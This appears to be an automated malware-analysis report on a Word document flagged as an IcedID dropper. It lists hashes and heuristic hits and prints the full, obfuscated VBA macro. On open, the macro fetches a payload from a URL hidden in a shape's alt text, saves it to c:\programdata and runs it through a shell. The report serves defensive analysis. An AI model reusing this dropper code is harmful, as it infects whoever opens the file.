Office (OOXML) malware analysis — malicious · bf23c0e1846d661c

MALICIOUS

Office (OOXML)

138.1 KB Created: 2020-10-07 08:33:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-09

MD5: 29dcad9488730f0932be15046382de15 SHA-1: 50b98aa07173df8f4c7bcd6380489062b89bc9b3 SHA-256: bf23c0e1846d661caf1646070b23ee4b80d9c8f3855506d6eb294c49e494efdd

230 Risk Score

Heuristics 7

ClamAV: Doc.Dropper.IceID1020-9776828-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.IceID1020-9776828-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set YnBvY = CreateObject(mNrLb + xHmMV(2) + "shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set OtSrR = CreateObject("MSXML2.serverXMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10333 bytes
SHA-256: `3443a9378a6336c600b9fb5928e50c906b704cb4e79e09f33212e0933547fd86`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wOSJa" Sub IiuUL(ydQtR, Optional ByVal BCkNo As String = "c:\programdata\wWCTG.pdf") ' Buoyant detective ' Briefed defining ' Jugs ' Maturer tamest candour ' Grapefruit quailed exclusion bulk ninth ' Swamping vibrantly ' Bonbon certifying ' Mechanic enforcer musicologists upsidedown ' Eruptive sibilance ' Gubernatorial emboldens herons ' Counterfeit episodic abortionists ' Racecourses touchandgo ' Dote gambia ' Analytic thoroughness graveyards fobbed ' Maimings ' Post hammerhead oldmaids headings ' Retrievers corrector relinking snowwhite shared ' Misdirection coldish properly ' Overcharge slaving ' Forestalling occident hatchbacks heaping misappropriated absent ' Shoves interjects panther ' Flamed ' Ideology dressmaker minces ironlady ' Invidious inhibiting demilitarisation fiddly costive ' Intransigence turgidity ' Verifies repeat saline ' Motivates exhalations molarity ' Chins bases ' Headdress develops misjudgement ' Whizzkid eyelets referenced piled ' Flowed materialises bangers seesaw ' Schooldays stepparents forefront ' Steepens disowning ' Skydiver diehards extremes indefinitely rivalled ' Premised condors orchestrate signification ' Obsessive matriarchy convertibility aberrations ' Pastis antagonise paramilitaries ' Deaths ethos ' Bandit censoriousness fpBqH = BCkNo Open fpBqH For Output As #1 ' Parametrised enlivening bodyguards recovered ' Connotations studious rusty morphisms ' Bedpan stubborn yearling ' Impartiality slighted ' Entreaties epistemological calories sedative cuneiform hospices ' Garottes shrines lieu Print #1, ydQtR ' Infringement monogamously ' Impatiently encephalopathy flounces imaginable ' Measurements inflecting ' Twiddler milked Close #1 End Sub ' Scarcer ' Applause sinless indemnities teleprinter ' Pinkish initiatives ' Looking ' Recompute giltedged sundaes Sub AutoOpen() ' Industrialising ecosystem admonition castrato colourising ' Tunas phonograph undervaluing contractual ' Autocratic crawled ' Armlets ' Marmosets dazzled opportunist ' Explorable parader ' Ponds shirtless pangas ' Relink intentness ' Demoralised ' Exempts ' Disagreement margarine unnerving mousy ' Exchanging indiscriminately infidel ' Cedar quicksilver ' Creamery organelles detects collectivisation brigand inhalation ' Hotplates penalises formidably ' Emotion marinas fizzes ' Seduced dazing deteriorated ' Radiates awoken sonorities underrate gravitons ' Comforter pestilential moonlighting speculating ' Phytoplankton oleanders ' Syllogism machinist imprudently jadedness showpieces grooves bedstead ' Gloomier shortcircuit unshod permissiveness ' Honing braver telecommuting discords avert ' Publicans generic linguistic ' Slumbering deliberations midline ' Elands rumania aloof quiff Dim zKwDl As New AQHgY ' Emir ' Apprentices perfectionism visitor jottings ' Catchers calculative pelicans comfy greenhouses folly ' Diabolism window knuckles ' Protest thickskinned adjustments clip ydQtR = zKwDl.GLBTb() ' Impending ' Deteriorate dimples ' Vistas slack rangy ' Wrapping boasters skip ' Gazelle drier mills bulldozers ' Impedance outnumber IiuUL iBHMW(ydQtR) ' Coinage aeon excused rubbings crossly ships ' Enforcer incremented rebuffs valence unsuspecting ' Raisins tortured swan incremented ' Slurry inputting ' Elders drollery molars shamelessly ' Fiendish polevaulting epidermis ' Clumber leavening ' Offenders ' Stereoscopically protagonist introductions oscillators ' Hideout barks ' Corrodes malts locals pricier ' Sleeker lunging recommencing ' Apprised jolliest yodel forewords refiling DCTTY xHmMV(0) + "r32 c:\programdata\wWCTG.pdf", "" End Sub Function RTCzy(wxOuP, FOrLw) ' Undergrowth fillip obscuring herdsmen ' Smoothing shammed ' Scrubland masterpiece ' Hijacker sprightlier adored wince ' Tapering ' Lukewarm marquee disability schematic ' Unmnemonic sobered ' Shrewdest lifeblood optimisers scooters RTCzy = Split(wxOuP, FOrLw) End Function Attribute VB_Name = "OdmuS" ' Gnosticism specialisations transcribed beautifully blackleg ' Burdens perioperative marching swap asynchronous intuitions ' Incorporated ' Direness pointless unassertive describers perceives truncheons ' Pacifying ream ' Courageously hoaxers find winders Function iBHMW(ujvRX) ' Placards rescanned ' Degenerate ninefold sentience flatmates ' Franchise braves twofaced apeman ' Polygamous ' Notationally kinetic patients iBHMW = StrConv(ujvRX, vbUnicode) ' Liminal crosssection ' Oblique housebreakers protested connectivity sanctifying ' Sandbank panama ' Perquisites miscounting hitches representativeness potion ' Oldmaids mix disability harkens leaper magnetometers ' Chomp peachiest nightgown innocents End Function ' Expositions straddled impute tugged tightfisted ' Redemption whilst oblique ozone ' Retted ' Ballet crystals incantatory ' Checklists publication ' Neutralising conical intestacy scent consciousnesses Function NAiCm() ' Pacifist batik praising frictions viol sleepier ' Contemplations renegotiating tigerish certify closely scratching ' Wobble lucre adjourns ' Dreamer robot ' Ventriloquist inoculated kneeling jumbo mounting ' Thinkers smouldered mouthed ' Accredits fountain locators dropouts ' Lowering reforms NAiCm = ActiveDocument.shapes(1).AlternativeText End Function ' Artificial addition ordained ' Underpants meatless ' Gestapo iteration dedicates ' Laryngitis canvasser sartorial cylinders looser ' Elevating jettisoned fibbers sequestered aspirants ' Shops stethoscope motels hears ' Traditionalists nativity ' Contemplation Function xHmMV(VerfK) ' Laughs annealing xenophobic ' Luck dactyl jostles easygoing ' Pediment profiteers dissipates ' Cleverest rubidium costlier ' Macho tummy frazzle ' Casuistry bates eminences ' Conjugations interjects castiron unpaid ' Holsters sloppiest tangibly disputatious ' Deducted skulduggery celluloid shags preambles booking girlishness ' Creakier focused warmness gossamer cuff EWckC = NAiCm() UioiR = RTCzy(EWckC, "kri") nNTAu = UioiR(VerfK) xHmMV = nNTAu End Function Attribute VB_Name = "AQHgY" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False ' Negative transport ' Neophyte exhumes transformer channelled rebuild ' Waded ' Deflower idioms trampolines ' Suitably ' Feebler pruritus sternly reconvert refuels Function GLBTb() ' Inequality experiencing tubby ' Uncleanly ' Lobbyist rebuild ' Throughout Dim OtSrR As Object ' Mayoress senegal ' Leek undrinkable ' Minimally sneering ' Sips spouts exert twelfth unveil ' Landlord salamander ' Lolled picket fabled ' Suasion pretreatments ' Falconer grievers faun ' Favour interjecting ' Beauts prostitute toilette tangential unbeatable Set OtSrR = CreateObject("MSXML2.serverXMLHTTP") ' Widowhood intermediaries rehabilitate disinterestedly ketch supervene deputising ' Bulwarks typified wave thrashes adroitness feral ' Capacitive warping collides manila ' Prepaid quavers ' Strokes spineless overstretched ' Wallflowers warnings hypocritical ' Scintillator thermometers micrometers wedded ' Shapers ' Lawbreaker jakarta wherewith ' Masts fanciful ' Baggages consolidates widowed ogre ' Buzzing broad fief independence fogging patriarchy ' Fob ' Requiem ' Idiosyncrasies ' Slowed chicane ornamental ' Whispering ' Bangle putput qualms ' Wallow journalese ' Omnipresent selfevident ' Beneficially welfare ' Subvention magistrates enliven ' Averting ashtrays fourteenth upyJE = xHmMV(1) ' Contemptuously redraft aerofoils editorship ' Burgeons serial ' Preaching ' Organs ' Advert hatched palm streak ' Itself seamstress mortify teeth crozier despotism ' Misunderstands interminable cape OtSrR.Open "GET", upyJE, False ' Undid nonconformist ' Entity unitary electricity baptist ' Cacti thunders orator ' Concluding doorkeepers concordances transducers captivating ' Proposing ' Doodle monomer caps ' Auditioned participated prosecutors OtSrR.Send ' Venerated cornea mannered ' Deviant dampers ' Stoker cryptanalyst manifest ' Afflict ' Mystify ' Proposer adventures whalebone mountaineering GLBTb = OtSrR.responsebody End Function Attribute VB_Name = "LltgF" Sub DCTTY(sjfzI, mNrLb) ' Gazelles sensibly ' Switchgear goosestepping singleness modernised cosier revivalists contemplates ' Gnu priggishness dilatation curious ' Faulty cabs mulberry unheeded ' Abutments harried flowers oilfields ' Bother furniture partner theology ' Unbar charter pothole championing prostitutes Set YnBvY = CreateObject(mNrLb + xHmMV(2) + "shell") ' Genocide cucumbers concert liberation ' Bypasses backsliding pocketed ' Whitecollar omnipresent selfsacrifice ' Vaccinated protested hushhush ' Flyhalf unsound retrieval ' Unspeakably redressing ' Disgusted oedipus juggler bathrobe ' Extorting jabbing manhandle passive speaks ' Victorious excelsior slake incombustible sombre roundhouse sashes rephrases ' Subunits granted ' Superabundant fullish thumbed misdirection ' Charitable squats ' Gents stylised unhand hangglides ' Undisguisedly caw ' Gleamed transparency ' Foreplay ' Alerts evaluated universalist girlish ' Emissivities rephrasing ' Linked ' Monitoring ' Slimly bowlines With YnBvY ' Baked idleness ' Blowpipe profuse ' Perpetuates encyclical substantiate detectors ' Impugning agriculturally ' Grain ' Licensee unworkable .exec (sjfzI) ' Saltier ' Shadowed pried fetishists sculptors liquidity ' Geneticist ulterior crypts signwriter ' Daydreaming optics ' Storeys serpentine End With ' Admires rotated ' Posits anomalies definably exacerbating ' Render saucers intentness caterwauls fission ' Legislature erection ' Settees End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	40960 bytes
SHA-256: `5c0b368d8235626653eee188b567f9ce983a82a69867a45a2c1454382a3dcb72`

Open this report in the interactive analyzer, or submit your own file for analysis.